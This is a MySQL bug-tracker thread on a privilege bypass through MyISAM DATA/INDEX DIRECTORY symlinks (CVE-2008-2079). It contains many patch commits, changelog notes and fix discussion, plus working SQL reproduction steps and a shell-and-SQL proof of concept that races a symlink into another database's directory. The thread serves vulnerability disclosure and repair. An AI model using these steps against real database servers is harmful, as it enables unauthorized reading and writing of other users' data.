Bug #32167 another privilege bypass with DATA/INDEX DIRECTORY
Submitted: 7 Nov 2007 18:42 Modified: 12 Mar 2010 17:53
Reporter: Sergei Golubchik Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Server: MyISAM storage engine Severity:S3 (Non-critical)
Version:any OS:Any
Assigned to: Georgi Kodinov CPU Architecture:Any
Tags: Security
Triage: D2 (Serious)

[7 Nov 2007 18:42] Sergei Golubchik
Description:
When one creates a MyISAM table with

   CREATE TABLE ( ) DATA DIRECTORY ... INDEX DIRECTORY ...

there're special checks to ensure that existing tables are not overwritten via symlinks. That is, one cannot create a 'user' table in the 'test' db, with DATA DIRECTORY pointing to 'mysql' db.

When one creates a table without symlinks, existing files are overwritten. It is intentional too.

But it creates a problem similar to "insecure tempfile creation" - an attacker can create a table with MYD/MYI files in another database, and if another user will later create a table in that database with the same name, the attacker will be able to access the table bypassing privilege checks.

How to repeat:
root> grant all privileges on test.* to test@localhost;

test> create table t1 (a int) data directory '/MySQL/var/mysql', index directory '/MySQL/var/mysql';

root> flush tables;
root> create table t1 (a int);
root> insert t1 values (1),(2),(3);
root> flush tables;

test> select * from t1;

Suggested fix:
don't allow symlinks into datadir
[22 Nov 2007 14:04] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38278

ChangeSet@1.2198, 2007-11-22 17:59:11+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[27 Nov 2007 12:45] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38623

ChangeSet@1.2198, 2007-11-27 16:39:47+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[28 Nov 2007 9:58] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38680

ChangeSet@1.2198, 2007-11-28 13:53:01+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(2nd version)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[28 Nov 2007 15:08] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38704

ChangeSet@1.2198, 2007-11-28 19:02:52+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(3rd version)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 8:17] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38932

ChangeSet@1.2198, 2007-11-30 12:11:33+04:00, gluh@mysql.com +3 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(3rd version)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 9:20] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38937

ChangeSet@1.2198, 2007-11-30 13:14:47+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 12:00] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38952

ChangeSet@1.2218, 2007-11-30 15:54:55+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[30 Nov 2007 14:16] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/38966

ChangeSet@1.2592, 2007-11-30 18:10:36+04:00, gluh@mysql.com +2 -0
  bug29325 test case is removed because of Bug#32167 fix
[30 Nov 2007 14:44] Sergei Golubchik
partitioning isn't covered by the first fix
[7 Dec 2007 11:19] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/39513

ChangeSet@1.2679, 2007-12-07 15:14:52+04:00, gluh@mysql.com +8 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[18 Dec 2007 12:53] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/40134

ChangeSet@1.2679, 2007-12-18 16:48:12+04:00, gluh@mysql.com +13 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(2nd version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of 'mysql data home'/'any db name' in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed
[4 Feb 2008 12:15] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/41636

ChangeSet@1.2679, 2008-02-04 16:09:35+04:00, gluh@mysql.com +13 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(3rd version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of 'mysql data home'/'any db name' in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed
[28 Feb 2008 12:54] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/43143

ChangeSet@1.2573, 2008-02-28 16:46:52+04:00, gluh@mysql.com +13 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(3rd version for 5.1)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of 'mysql data home'/'any db name' in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed
[29 Feb 2008 9:01] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/43198

ChangeSet@1.2574, 2008-02-29 12:52:50+04:00, gluh@mysql.com +5 -0
  additional test fix for Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
[29 Feb 2008 10:03] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/43206

ChangeSet@1.2707, 2008-02-29 13:55:00+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(ver 4.1,5.0)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.
[13 Mar 2008 19:29] Bugs System
Pushed into 6.0.5-alpha
[13 Mar 2008 19:36] Bugs System
Pushed into 5.1.24-rc
[13 Mar 2008 19:43] Bugs System
Pushed into 5.0.60
[13 Mar 2008 19:43] Bugs System
Pushed into 4.1.24
[15 Mar 2008 11:29] Jon Stephens
Documented bugfix in the 4.1.24, 5.0.60, 5.1.24, and 6.0.5 changelogs as follows:

        It was possible to circumvent privileges through the creation of
        MyISAM tables employing the DATA DIRECTORY and INDEX DIRECTORY
        options to overwrite existing table files in the MySQL data
        directory. Use of the MySQL data directory in DATA DIRECTORY and
        INDEX DIRECTORY is now disallowed.

In addition, the changelog entries for 5.1.24 and 6.0.5 includes the statement:

                                           This is also true for partitioned
        tables and individual table partitions.

Also added a note to the relevant section of the CREATE TABLE Syntax section in the 4.1./5.0/5.1/6.0 Manuals.
[31 Mar 2008 14:34] Jon Stephens
Also noted in the 5.1.23-ndb-6.3.11 changelog.
[6 May 2008 9:16] Sergei Golubchik
please, note in the manual that it's CVE-2008-2079
[9 May 2008 12:05] Norbert Tretkowski
I'm missing the patch for 5.0. There was one commit into the 5.0 repository, but it only removed a test case.
[9 May 2008 12:43] Sergei Golubchik
It was merged from 4.1. Note that 5.1 required a new fix only because of a new feature - partitioning, not because we do a separate patch for every branch.

When I'm looking in my 5.0 tree this is what I see:

% bk changes -/#32167/
ChangeSet@1.1616.3128.2, 2008-02-29 13:55:00+04:00, gluh@mysql.com +5 -0
  Bug#32167 another privilege bypass with DATA/INDEX DIRECORY(ver 4.1,5.0)
  added new function test_if_data_home_dir() which checks that
  path does not contain mysql data home directory.
  Using of mysql data home directory in
  DATA DIRECTORY & INDEX DIRECTORY is disallowed.

So, that's the patch that got into 5.0
[9 May 2008 13:04] Norbert Tretkowski
Ah, I missed the comment about the MySQL version, thanks for the pointer.
[9 May 2008 15:20] Norbert Tretkowski
The patch does not apply on the current Community Edition release 5.0.51b.
[9 May 2008 16:23] Paul Dubois
5.0.51b precedes 5.0.60. The patch will appear in the next community release with a version higher than 5.0.60.
[9 May 2008 17:44] Norbert Tretkowski
That doesn't really help Linux distributions which are shipping the Community Edition of MySQL.
[20 May 2008 20:54] Paul Dubois
Added CVE number to changelog entry.
[7 Jul 2008 7:46] Devin Carraway
At least some of the patches attached to this bug do not appear to be sufficient to address the vulnerability.  Commit#38278 and #38623 call fn_format() with MY_RETURN_REAL_PATH but not MY_RESOLVE_SYMLINKS; this will cause my_realpath (as it appears in 5.0.51b) to rely entirely on an lstat() check to determine whether the given target is a symlink.  This is insufficient because an attacker can supply the path to a real directory underneath a symlink (e.g. /tmp/{foo -> /var/lib}/mysql) without triggering a simple lstat().

Commit #38680 and #38704 are even worse, in that besides the above problem, they then discard the output of fn_format() entirely, reusing the original input for comparison against the mysql data homedir.

Commit #38932, #38937, #38952, #39513, #40134, #41636, #43143 and #43206 are a mix of these -- they pass MY_RETURN_REAL_PATH to fn_format(), but then ignore its output.

Note that my reading of these patches is based on 5.0.51b and 5.0.32's implementations of fn_format() as a reference; I've tested that backports of #38680/38704 to these versions do not correct the vulnerability, but am only doing a visual reading of the others.
[7 Jul 2008 9:45] Sergei Golubchik
Also, the check is not sufficient. test_if_data_home_dir() should be called every time the table is opened, not only when it's created.
[13 Jul 2008 20:34] Devin Carraway
After a discussion with other members of the Debian security team, I wanted to pass on a request that you consider a non-path based solution to this issue, at least on operating systems where one is feasible.

There are two basic problems with the path-based fix to this bug employed thus far.  First and most simply, it only works to protect database users who store their data/index files under the mysql data root (whether by deliberate act or by default).  Users who store a table's files outside that path (e.g. to manage disk resources) are still vulnerable to attack.

Secondly, on many operating systems paths aren't a reliable mapping to files.  Linux, for example, supplies bind mounts, where a subset of one filesystem can be made to appear in another location.  There is no symlinking, and a realpath() called on a file in a bind mount will not return the path from the "source" filesystem.  The unionfs feature in FreeBSD, Linux and Plan9 present the same problem, and MacOS' recently-added directory hardlinks probably do as well.  Most of these cases require sysadmin/DBA intervention to bring about the preconditions for the attack, but while unusual are hardly unprecedented.

Under most conditions, the proper fix would be to create new files with O_CREAT|O_EXCL and not try to control path usage.  However, in mysql's particular case this turns an authorization check bypass weakness into a DoS weakness -- though it might be the only viable option for supporting arbitrary user-supplied paths outside the mysql data directory.  For protection within the data directory, you might consider doing inode-based checks based on device+inode number, which are stable at least across bind mounts.  Or you could make passing DATA/INDEX DIRECTORY clauses to CREATE TABLE statements a privileged operation in itself.
[14 Jul 2008 11:13] Sergei Golubchik
There's an option to create new files with O_CREAT|O_EXCL. See mysqld --help for keep_files_on_create.

I'm not sure I understand your device+inode idea - does it mean the server would need to scan all databases in the datadir to know all inode numbers of all tables ?
[14 Jul 2008 12:57] Christian Hammers
Hello Sergey

I guess this would indeed mean that MySQL would have to do a stat() call for every directory. Something like: 
"find /var/lib/mysql -type d -printf "%D %i %p\n"
 
bye,

-christian-
[17 Jul 2008 5:35] Devin Carraway
If you're trying to protect the mysql data directory and its descendants, then you can do so with a stat() call on that directory, then on each component of the user-supplied index/data directory path (hence for /tmp/foo/bar: /tmp, /tmp/foo, /tmp/foo/bar).  If any of the supplied path's ancestors or the path itself match the mysql data dir, then the user has supplied a path in or under it.  This would not protect databases with data/index dirs outside the mysql root -- for that you'd have to check for a nonempty intersection between the inodes of the components of the user-supplied path and those of each data/index dir used by every other database within that mysqld.

There are a number of potential race conditions in such a check, though they apply equally to a path-based readlink() or realpath() check as well.  Essentially, if mysqld creates the table's data files under a user-controlled path after checking for its validity, then you're not guaranteed that the path used for the create is the same one you checked.  For an attacker trying to exploit the race condition, the odds aren't too shabby, and they can retry as many times as they like until they succeed.

Since there isn't an atomic stat-directory-and-open-file-therein system call in UNIX, to avoid the race may require an ownership-based lstat() check as well, to assure that there aren't any components of the path writable by users other than mysqld's own and root.  And the operation might need to be performed under a global lock so as to protect against races with table storage paths as well.  It sucks, but it might be the price of admission for a feature like this one.
[17 Jul 2008 7:33] Sergei Golubchik
So far we're still implementing readlink/realpath solution.

For a bind mounts, for example, we say that it's DBA problem - in particular, if he has made two different paths /a/b/c/d and /e/f/g/h to refer to the same file, he himself needs to make sure that one of these paths is unreadable for mysql user (user, mysqld is running as), e.g. set permissions on c/ directory appropriately.

A simple solution to fix races is to check a path with a realpath, and then use the *expanded* , "real" path to access a file, not the original one.
[18 Jul 2008 7:06] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50005

2705 Alexey Botchkov	2008-07-18
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      test_if_data_home_dir fixed to look into real path.
      Checks added to mi_open for symlinks into data home directory.
[18 Jul 2008 7:43] Devin Carraway
Sorry I didn't get to this earlier, but using realpath()'s return value won't work either if the attacker controls any of the components of the (real) path.  Here's a PoC illustrating why, using a mysqld patched to use a realpath() call.  At the time the test_if_data_home_dir() check is run, the path given involves no symlinks at all and does not refer to the mysql data dir.  But by the time the table's files are actually created, the path now includes a symlink to another database's data directory, and the files end up there.

Starting conditions were two empty databases, test1 and test2, with a user allowed to create in t1 but not in t2, and a root user that can create in t2.

First, as the test user:

[etch-amd64] aqua@kesha:/tmp
$ rm -rf directory && umask 0 && mkdir directory && ls -ld directory
drwxrwxrwx 2 aqua 1000 1024 Jul 18 07:17 directory
[etch-amd64] aqua@kesha:/tmp
$ mysql -p test1
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.0.32-Debian_7etch6-log Debian etch distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> create table t1 (a int) data directory '/tmp/directory/' index directory '/tmp/directory/' ;
Query OK, 0 rows affected (0.04 sec)

mysql> 
[1]+  Stopped                 mysql -p test1
[etch-amd64] aqua@kesha:/tmp
$ mysql -p test1
[etch-amd64] aqua@kesha:/tmp
$ rm -rf directory && ln -s /var/lib/mysql/test2 directory && ls -ld directory
lrwxrwxrwx 1 aqua 1000 20 Jul 18 07:17 directory -> /var/lib/mysql/test2

Then, as the root user, in the test2 db:

mysql> create table t1 (a int) ;
Query OK, 0 rows affected (0.04 sec)

And as the test user, back in test1:

mysql> insert into t1 values (1),(2),(3) ;
Query OK, 3 rows affected (0.00 sec)
Records: 3  Duplicates: 0  Warnings: 0

Finally, over in test2:

mysql> select * from t1 ;
+------+
| a    |
+------+
|    1 | 
|    2 | 
|    3 | 
+------+
3 rows in set (0.00 sec)

Sorry I didn't think of that earlier.  Finally, keep in mind that realpath() isn't atomic -- it's an iteration over lstat() and readlink(); if part of it is replaced with a symlink after the iteration has passed that part, realpath() won't tell you:

00:37:31.512490 getcwd("/tmp"..., 4096) = 5 <0.000016>
00:37:31.512581 lstat("/tmp/a", {st_mode=S_IFDIR|0755, st_size=1024, ...}) = 0 <0.000019>
/* inject rename("a", "a.old"); symlink("/var/lib/mysql", "a"); */
00:37:31.512706 lstat("/tmp/a/b", {st_mode=S_IFDIR|0755, st_size=1024, ...}) = 0 <0.000017>
[18 Jul 2008 7:48] Devin Carraway
BTW, reading over that checkin, by putting a realpath check into the open call you narrow the window of vulnerability considerably -- just keep in mind that symlinks can be anywhere in a path, while lstat() only checks the last component.
[18 Jul 2008 8:44] Sergei Golubchik
Right, that's precisely why we moved the check to the place where a file is *opened*, not where it's *created* - to stop attacks like the one you described.
[18 Jul 2008 13:12] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50036

2705 Alexey Botchkov	2008-07-18
      bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      test_if_data_home_dir fixed to look into the real path.
      Checks added to mi_optn for symlinks into data home directory.
[26 Jul 2008 10:53] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50551

2705 Alexey Botchkov	2008-07-26
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
            
            test_if_data_home_dir fixed to look into real path.
            Checks added to mi_open for symlinks into data home directory.
      modified:
        include/my_sys.h
        include/myisam.h
        myisam/mi_check.c
        myisam/mi_open.c
        myisam/mi_static.c
        myisam/myisamchk.c
        myisam/myisamdef.h
        mysql-test/r/symlink.result
        mysys/my_symlink.c
        sql/mysql_priv.h
        sql/mysqld.cc
        sql/sql_parse.cc
      
      per-file messages:
        include/my_sys.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          my_is_symlink interface added
        include/myisam.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          myisam_test_invalid_symlink interface added
        myisam/mi_check.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          mi_open_datafile calls modified
        myisam/mi_open.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          code added to mi_open to check for symlinks into data home directory.
          mi_open_datafile now accepts 'original' file path to check if it's
          an allowed symlink.
        myisam/mi_static.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          myisam_test_invlaid_symlink defined
        myisam/myisamchk.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          mi_open_datafile call modified
        myisam/myisamdef.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          mi_open_datafile interface modified - 'real_path' parameter added
        mysql-test/r/symlink.test
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          error codes corrected as some patch now rejected pointing inside datahome
        mysql-test/r/symlink.result
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          error messages corrected in the result
        mysys/my_symlink.c
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          my_is_symlink() implementsd
          my_realpath() now returns the 'realpath' even if a file isn't a symlink
        sql/mysql_priv.h
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          test_if_data_home_dir interface
        sql/mysqld.cc
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          myisam_test_invalid_symlik set with the 'test_if_data_home_dir'
        sql/sql_parse.cc
          Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
          
          error messages corrected
          test_if_data_home_dir code fixed
[31 Jul 2008 11:03] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/50773

2584 Alexey Botchkov	2008-07-31
      Buq#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
          test_if_data_home_dir fixed to look into real path.
          Checks added to mi_open for symlinks into data home directory.
      
       per-file messages:
              include/my_sys.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                my_is_symlink interface added
      
              mysql-test/r/udf.result
                test result fixed (not related to #32167)
      
              mysys/my_symlink.c
                my_is_symlink() implementsd
                my_realpath() now returns the 'realpath' even if a file isn't a symlink
[5 Aug 2008 17:40] Paul Dubois
Noted in 5.0.67 changelog.

It was possible to circumvent privileges through the creation of
MyISAM tables employing the DATA DIRECTORY and INDEX DIRECTORY 
options to overwrite existing table files in the MySQL data
directory. Use of the MySQL data directory in DATA DIRECTORY and
INDEX DIRECTORY pathname is now disallowed.

Leaving report in Patch Approved status.
[22 Aug 2008 13:43] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52326

2672 Alexey Botchkov	2008-08-22
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                  
                  test_if_data_home_dir fixed to look into real path.
                  Checks added to mi_open for symlinks into data home directory.
      
      per-file messages:
              include/my_sys.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                my_is_symlink interface added
              include/myisam.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                myisam_test_invalid_symlink interface added
              myisam/mi_check.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                mi_open_datafile calls modified
              myisam/mi_open.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                code added to mi_open to check for symlinks into data home directory.
                mi_open_datafile now accepts 'original' file path to check if it's
                an allowed symlink.
              myisam/mi_static.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                myisam_test_invlaid_symlink defined
              myisam/myisamchk.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                mi_open_datafile call modified
              myisam/myisamdef.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                mi_open_datafile interface modified - 'real_path' parameter added
              mysql-test/r/symlink.test
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                error codes corrected as some patch now rejected pointing inside datahome
              mysql-test/r/symlink.result
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                error messages corrected in the result
              mysys/my_symlink.c
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                my_is_symlink() implementsd
                my_realpath() now returns the 'realpath' even if a file isn't a symlink
              sql/mysql_priv.h
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                test_if_data_home_dir interface
              sql/mysqld.cc
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                myisam_test_invalid_symlik set with the 'test_if_data_home_dir'
              sql/sql_parse.cc
                Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
                
                error messages corrected
                test_if_data_home_dir code fixed
[26 Aug 2008 14:32] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52569

2725 Mattias Jonsson	2008-08-26
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY
      
      post push fix
      
      Updated partition_symlink since different error behavior
      if embedded (or not partitioned)
[26 Aug 2008 18:34] Bugs System
Pushed into 5.0.70  (revid:holyfoot@mysql.com-20080822123153-ej8aa99od7gafd8f) (version source revid:davi.arnaut@sun.com-20080826182704-ikgad9sf3142e7x9) (pib:3)
[26 Aug 2008 19:11] Bugs System
Pushed into 5.1.28  (revid:mattiasj@mysql.com-20080826143130-f3soa1axcrqeqjte) (version source revid:davi.arnaut@sun.com-20080826183817-r22ie0hgagpcn6su) (pib:3)
[26 Aug 2008 19:30] Paul Dubois
Noted in 5.0.70, 5.1.28 changelogs.

Setting report to NDI pending push into 6.0.x.
[27 Aug 2008 5:27] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52643

2729 Mattias Jonsson	2008-08-27
      Bug#32167
      
      post push fix for failing valgrind test (since code was not used in valgrind)
[28 Aug 2008 13:46] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52849

2730 Mattias Jonsson	2008-08-28
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      post push patch
      
      when building with valgrind, it does not compile in realpath,
      so this test fails when using a valgrind build
      NOTE: building with valgrind is not the same as useing the
      --valgrind option with mysql-test-run
[28 Aug 2008 15:01] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52854

2723 Mattias Jonsson	2008-08-28
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      post push patch
      when building with valgrind, it does not compile in realpath,
      so this test fails when using a valgrind build
      NOTE: building with valgrind is not the same as useing the
      --valgrind option with mysql-test-run
[28 Aug 2008 15:05] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/52857

2723 Mattias Jonsson	2008-08-28
      Bug#32167 another privilege bypass with DATA/INDEX DIRECTORY.
      
      post push patch
      when building with valgrind, it does not compile in realpath,
      so this test fails when using a valgrind build
      NOTE: building with valgrind is not the same as useing the
      --valgrind option with mysql-test-run
[13 Sep 2008 22:29] Bugs System
Pushed into 6.0.6-alpha  (revid:holyfoot@mysql.com-20080822123153-ej8aa99od7gafd8f) (version source revid:hakan@mysql.com-20080716105246-eg0utbybp122n2w9) (pib:3)
[16 Sep 2008 4:44] Paul Dubois
Noted in 6.0.6 changelog.
[26 Sep 2008 12:30] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/54543

2698 He Zhenxing	2008-09-26 [merge]
      Merge 5.1 main -> 5.1-rpl
[30 Sep 2008 13:26] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/54774

2667 He Zhenxing	2008-09-29 [merge]
      Auto Merge
[1 Oct 2008 16:07] Bugs System
Pushed into 5.1.28  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:kgeorge@mysql.com-20080828152406-25mkut4u5tocs4et) (pib:4)
[14 Oct 2008 15:13] Bugs System
Pushed into 4.1.25  (revid:holyfoot@mysql.com-20080726093931-1ubj8csfdd8jx11l) (version source revid:holyfoot@mysql.com-20080726093931-1ubj8csfdd8jx11l) (pib:4)
[23 Oct 2008 17:40] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/56925

2642 Jonathan Perkin	2008-10-23
      Merge fixes for bug#32167 and bug#37428 into 5.0.66sp1
[28 Oct 2008 21:01] Bugs System
Pushed into 5.1.29-ndb-6.2.17  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:tomas.ulin@sun.com-20081028140209-u4emkk1xphi5tkfb) (pib:5)
[28 Oct 2008 22:20] Bugs System
Pushed into 5.1.29-ndb-6.3.19  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:tomas.ulin@sun.com-20081028194045-0353yg8cvd2c7dd1) (pib:5)
[1 Nov 2008 9:44] Bugs System
Pushed into 5.1.29-ndb-6.4.0  (revid:mattiasj@mysql.com-20080828145922-sydhto6u4va3cb4b) (version source revid:jonas@mysql.com-20081101082305-qx5a1bj0z7i8ueys) (pib:5)
[21 Nov 2008 17:07] Paul Dubois
Noted in 5.0.66sp1 changelog.
[25 Nov 2008 16:26] Paul Dubois
For the record, here's a summary history of fixes for this bug:

* Original fix applied to 4.1.24, 5.0.60, 5.1.24, 6.0.5
* Secondary fix applied to 4.1.25, 5.0.70, 5.1.28, 6.0.6
* Original fix applied to first Community release following 5.0.60 (i.e., 5.0.67)
* Original + secondary fixes applied to 5.0.66sp1 Service Pack release

Description for the secondary fix:

Additional corrections were made for the symlink-related privilege
problem originally addressed. The original fix did not correctly
handle the data directory pathname if it contained symlinked
directories in its path, and the check was made only at 
table-creation time, not at table-opening time later.
[16 Jan 2009 11:16] Bugs System
Pushed into 5.0.77 (revid:joerg@mysql.com-20090115110809-bnb54922hwgrv2hk) (version source revid:joerg@mysql.com-20090115104831-o8sb30ms6qc8s8je) (merge vers: 5.0.77) (pib:6)
[16 Jan 2009 11:20] Bugs System
Pushed into 5.1.32 (revid:joerg@mysql.com-20090115181125-29qdo615v9vkla0t) (version source revid:joerg@mysql.com-20090115181125-29qdo615v9vkla0t) (merge vers: 5.1.32) (pib:6)
[20 Jan 2009 18:55] Bugs System
Pushed into 6.0.10-alpha (revid:joro@sun.com-20090119171328-2hemf2ndc1dxl0et) (version source revid:timothy.smith@sun.com-20090116165151-xtp5e4z6qsmxyvy0) (merge vers: 6.0.10-alpha) (pib:6)
[17 Feb 2009 14:56] Bugs System
Pushed into 5.1.32-ndb-6.3.23 (revid:tomas.ulin@sun.com-20090217131017-6u8qz1edkjfiobef) (version source revid:tomas.ulin@sun.com-20090203133556-9rclp06ol19bmzs4) (merge vers: 5.1.32-ndb-6.3.22) (pib:6)
[17 Feb 2009 16:44] Bugs System
